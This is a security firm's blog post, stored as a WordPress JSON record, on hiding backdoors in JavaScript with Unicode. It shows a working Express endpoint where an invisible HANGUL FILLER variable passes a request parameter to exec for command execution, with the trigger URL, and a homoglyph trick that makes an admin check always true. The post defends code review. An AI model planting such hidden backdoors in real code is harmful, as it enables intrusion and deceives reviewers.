{"id":738,"date":"2021-11-09T13:31:47","date_gmt":"2021-11-09T11:31:47","guid":{"rendered":"https:\/\/certitude.consulting\/blog\/?p=738"},"modified":"2022-01-19T14:57:01","modified_gmt":"2022-01-19T12:57:01","slug":"invisible-backdoor","status":"publish","type":"post","link":"https:\/\/certitude.consulting\/blog\/en\/invisible-backdoor\/","title":{"rendered":"The Invisible JavaScript Backdoor"},"content":{"rendered":"\n<p>A few months ago we saw a <a href=\"https:\/\/www.reddit.com\/r\/programminghorror\/comments\/o9dm6r\/i_was_getting_errors_and_couldnt_pinpoint_it\/\" data-type=\"URL\" data-id=\"https:\/\/www.reddit.com\/r\/programminghorror\/comments\/o9dm6r\/i_was_getting_errors_and_couldnt_pinpoint_it\/\" target=\"_blank\" rel=\"noreferrer noopener\">post <\/a>on the <em>r\/programminghorror<\/em> subreddit: A developer describes the struggle of identifying a syntax error resulting from an invisible Unicode character hidden in JavaScript source code. This post inspired an idea: What if a backdoor <em>literally <\/em>cannot be <em>seen<\/em> and thus evades detection even from <em>thorough <\/em>code reviews?<\/p>\n\n\n\n<p>Just as we were finishing up this blog post, a team at the University of Cambridge released a <a href=\"https:\/\/www.trojansource.codes\/\">paper<\/a> describing such an attack. Their approach, however, is quite different from ours &#8211; it focuses on the Unicode bidirectional mechanism (Bidi). We have implemented a different take on what the paper titles &#8220;<em>Invisible Character Attacks<\/em>&#8221; and &#8220;<em>Homoglyph Attacks<\/em>&#8220;.<\/p>\n\n\n\n<p>Without further ado, here&#8217;s the <em>backdoor<\/em>. Can you spot it?<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>const express = require('express');\nconst util = require('util');\nconst exec = util.promisify(require('child_process').exec);\n\nconst app = express();\n\napp.get('\/network_health', async (req, res) =&gt; {\n    const { timeout,\u3164} = req.query;\n    const checkCommands = &#91;\n        'ping -c 1 google.com',\n        'curl -s http:\/\/example.com\/',\u3164\n    ];\n\n    try {\n        await Promise.all(checkCommands.map(cmd =&gt; \n                cmd &amp;&amp; exec(cmd, { timeout: +timeout || 5_000 })));\n        res.status(200);\n        res.send('ok');\n    } catch(e) {\n        res.status(500);\n        res.send('failed');\n    }\n});\n\napp.listen(8080);<\/code><\/pre>\n\n\n\n<p>The script implements a very simple network health check HTTP endpoint that executes <code>ping -c 1 google.com<\/code> as well as <code>curl -s http:\/\/example.com<\/code> and returns whether these commands executed successfully. The optional HTTP parameter <code>timeout<\/code> limits the command execution time.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">The Backdoor<\/h2>\n\n\n\n<p>Our approach for creating the backdoor was to first, find an invisible Unicode character that can be interpreted as an identifier\/variable in JavaScript. Beginning with ECMAScript version 2015, all Unicode characters with the Unicode property <code>ID_Start<\/code> can be used in identifiers (characters with property <code>ID_Continue<\/code> can be used after the initial character).<\/p>\n\n\n\n<p>The character &#8220;\u3164&#8221; (0x3164 in hex) is called <em>&#8220;HANGUL FILLER&#8221;<\/em> and belongs to the Unicode category <em>&#8220;Letter, other&#8221;<\/em>. As this character is considered to be a <em>letter<\/em>, it has the <code>ID_Start<\/code> property and can therefore appear in a JavaScript variable &#8211; perfect!<\/p>\n\n\n\n<p>Next, a way to use this invisible character <em>unnoticed <\/em>had to be found. The following visualizes the chosen approach by replacing the character in question with its <em>escape sequence<\/em> representation:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>    const { timeout,<strong>\\u3164<\/strong>} = req.query;<\/code><\/pre>\n\n\n\n<p>A <a rel=\"noreferrer noopener\" href=\"https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/JavaScript\/Reference\/Operators\/Destructuring_assignment\" target=\"_blank\">destructuring assignment<\/a> is used to deconstruct the HTTP parameters from <code>req.query<\/code>. Contrary to what can be <em>seen<\/em>, the parameter <code>timeout<\/code> is not the sole parameter unpacked from the <code>req.query<\/code> attribute! An additional variable\/HTTP parameter named &#8220;\u3164&#8221; is retrieved &#8211; if a HTTP parameter named &#8220;\u3164&#8221; is passed, it is assigned to the invisible variable <code>\u3164<\/code>.<\/p>\n\n\n\n<p>Similarly, when the <code>checkCommands<\/code> array is constructed, this variable <code>\u3164<\/code> is included into the array:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>    const checkCommands = &#91;\n        'ping -c 1 google.com',\n        'curl -s http:\/\/example.com\/',<strong>\\u3164<\/strong>\n    ];<\/code><\/pre>\n\n\n\n<p>Each element in the array, the hardcoded commands as well as the user-supplied parameter, is then passed to the <code>exec<\/code> function. This function executes OS commands. For an attacker to execute arbitrary OS commands, they would have to pass a parameter named &#8220;\u3164&#8221; (in it&#8217;s URL-encoded form) to the endpoint:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>http:\/\/host:8080\/network_health?%E3%85%A4=<span style=\"text-decoration: underline;\">&lt;any command&gt;<\/span><\/code><\/pre>\n\n\n\n<p>This approach cannot be detected through syntax highlighting as invisible characters are not shown at all and therefore are not colorized by the IDE\/text editor:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/certitude.consulting\/blog\/wp-content\/uploads\/2021\/11\/hangul_filler_backdoor.png\" alt=\"\" class=\"wp-image-765\" width=\"844\" height=\"683\" srcset=\"https:\/\/certitude.consulting\/blog\/wp-content\/uploads\/2021\/11\/hangul_filler_backdoor.png 844w, https:\/\/certitude.consulting\/blog\/wp-content\/uploads\/2021\/11\/hangul_filler_backdoor-300x243.png 300w, https:\/\/certitude.consulting\/blog\/wp-content\/uploads\/2021\/11\/hangul_filler_backdoor-768x621.png 768w\" sizes=\"auto, (max-width: 844px) 100vw, 844px\" \/><\/figure>\n\n\n\n<p>The attack requires the IDE\/text editor (and the used font) to correctly render the invisible characters. At least <em>Notepad++<\/em> and <em>VS Code<\/em> render it correctly (in VS Code the invisible character is slightly wider than ASCII characters). The script behaves as described at least with Node 14.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Homoglyph Approaches<\/h2>\n\n\n\n<p>Besides <em>invisible<\/em> characters one could also introduce backdoors using Unicode characters that look <em>very similar <\/em>to e.g. operators:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>const &#91; ENV_PROD, ENV_DEV ] = &#91; 'PRODUCTION', 'DEVELOPMENT'];\n\/* \u2026 *\/\nconst environment = 'PRODUCTION';\n\/* \u2026 *\/\nfunction isUserAdmin(user) {\n    if(environment\u01c3=ENV_PROD){\n        \/\/ bypass authZ checks in DEV\n        return true;\n    }\n\n    \/* \u2026 *\/\n    return false;\n}<\/code><\/pre>\n\n\n\n<p>The &#8220;\u01c3&#8221; character used is not an exclamation mark but an &#8220;<em>ALVEOLAR CLICK<\/em>&#8221; character. The following line therefore does not compare the variable <code>environment<\/code> to the string <code>\"PRODUCTION\"<\/code> but instead assigns the string <code>\"PRODUCTION\"<\/code> to the previously undefined variable <code>environment\u01c3<\/code>:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>    if(environment\u01c3=ENV_PROD){<\/code><\/pre>\n\n\n\n<p>Thus, the expression within the if statement is always <code>true<\/code> (tested with Node 14).<\/p>\n\n\n\n<p>There are many other characters that look similar to the ones used in code which may be used for such proposes (e.g. &#8220;\uff0f&#8221;, &#8220;\u2212&#8221;, &#8220;\uff0b&#8221;, &#8220;\u2a75&#8221;, &#8220;\u2768&#8221;, &#8220;\u2afd&#8221;, &#8220;\ua4ff&#8221;, &#8220;\u2217&#8221;). Unicode calls these characters <a href=\"https:\/\/unicode.org\/reports\/tr36\/#visual_spoofing\" target=\"_blank\" rel=\"noreferrer noopener\">&#8220;confusables&#8221;<\/a>. <\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Takeaway<\/h2>\n\n\n\n<p>Note that messing with Unicode to hide vulnerable or malicious code is <a rel=\"noreferrer noopener\" href=\"https:\/\/github.com\/NebulousLabs\/glyphcheck\" target=\"_blank\">not<\/a> <a rel=\"noreferrer noopener\" href=\"https:\/\/twitter.com\/zygoloid\/status\/1187150150835195905\" target=\"_blank\">a<\/a> <a rel=\"noreferrer noopener\" href=\"https:\/\/github.com\/golang\/go\/issues\/20209\" target=\"_blank\">new<\/a> <a rel=\"noreferrer noopener\" href=\"https:\/\/twitter.com\/jupenur\/status\/1244286243518713857\" target=\"_blank\">idea<\/a> (also using <a rel=\"noreferrer noopener\" href=\"https:\/\/mobile.twitter.com\/veorq\/status\/843382644939374592\" target=\"_blank\">invisible characters<\/a>) and Unicode inherently opens up additional possibilities to <a rel=\"noreferrer noopener\" href=\"https:\/\/twitter.com\/FiloSottile\/status\/1455260886910783501\" target=\"_blank\">obfuscate code<\/a>. We believe that these tricks are quite neat though, which is why we wanted to share them.<\/p>\n\n\n\n<p>Unicode should be kept in mind when doing reviews of code from unknown or untrusted contributors. This is especially interesting for open source projects as they might receive contributions from developers that are effectively anonymous. <\/p>\n\n\n\n<p>The Cambridge team proposes restricting Bidi Unicode characters. As we have shown, homoglyph attacks and invisible characters can pose a threat as well. In our experience non-ASCII characters are pretty rare in code. Many development teams chose to use English as the primary development language (both for code and strings within the code) in order to allow for international cooperation (ASCII covers all\/most characters used in the English language). Translation into other languages is often done using dedicated files. When we review German language code, we mostly see non-ASCII characters being substituted with ASCII characters (e.g. \u00e4 \u2192 ae, \u00df \u2192 ss). It might therefore be a good idea to disallow any non-ASCII characters.<\/p>\n\n\n\n<p><strong>Update:<\/strong><\/p>\n\n\n\n<p>VS Code has issued an update that highlights invisible characters and confusables: <a href=\"https:\/\/code.visualstudio.com\/updates\/v1_63#_unicode-highlighting\">https:\/\/code.visualstudio.com\/updates\/v1_63#_unicode-highlighting<\/a><\/p>\n\n\n\n<p>Unicode is forming a task force to investigate issues with source code spoofing: <a href=\"https:\/\/www.unicode.org\/L2\/L2022\/22007-avoiding-spoof.pdf\">https:\/\/www.unicode.org\/L2\/L2022\/22007-avoiding-spoof.pdf<\/a><\/p>\n\n\n\n<hr class=\"wp-block-separator\"\/>\n\n\n\n<p>Cert<span style=\"text-decoration: underline;\">it<\/span>ude&#8217;s employees have many years of experience in code reviews and expertise in many languages and frameworks. If you are interested in working with Cert<span style=\"text-decoration: underline;\">it<\/span>ude to improve your application&#8217;s security, feel free to reach out to us at office@certitude.consulting.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>A few months ago we saw a post on the r\/programminghorror subreddit: A developer describes the struggle of identifying a syntax error resulting from an invisible Unicode character hidden in JavaScript source code. This post inspired an idea: What if a backdoor literally cannot be seen and thus evades detection even from thorough code reviews? [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":765,"comment_status":"closed","ping_status":"open","sticky":true,"template":"","format":"standard","meta":{"footnotes":""},"categories":[60],"tags":[175,86,178,176],"class_list":["post-738","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-technical-analysis","tag-backdoor","tag-research","tag-trojansource","tag-unicode"],"_links":{"self":[{"href":"https:\/\/certitude.consulting\/blog\/wp-json\/wp\/v2\/posts\/738","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/certitude.consulting\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/certitude.consulting\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/certitude.consulting\/blog\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/certitude.consulting\/blog\/wp-json\/wp\/v2\/comments?post=738"}],"version-history":[{"count":34,"href":"https:\/\/certitude.consulting\/blog\/wp-json\/wp\/v2\/posts\/738\/revisions"}],"predecessor-version":[{"id":977,"href":"https:\/\/certitude.consulting\/blog\/wp-json\/wp\/v2\/posts\/738\/revisions\/977"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/certitude.consulting\/blog\/wp-json\/wp\/v2\/media\/765"}],"wp:attachment":[{"href":"https:\/\/certitude.consulting\/blog\/wp-json\/wp\/v2\/media?parent=738"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/certitude.consulting\/blog\/wp-json\/wp\/v2\/categories?post=738"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/certitude.consulting\/blog\/wp-json\/wp\/v2\/tags?post=738"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}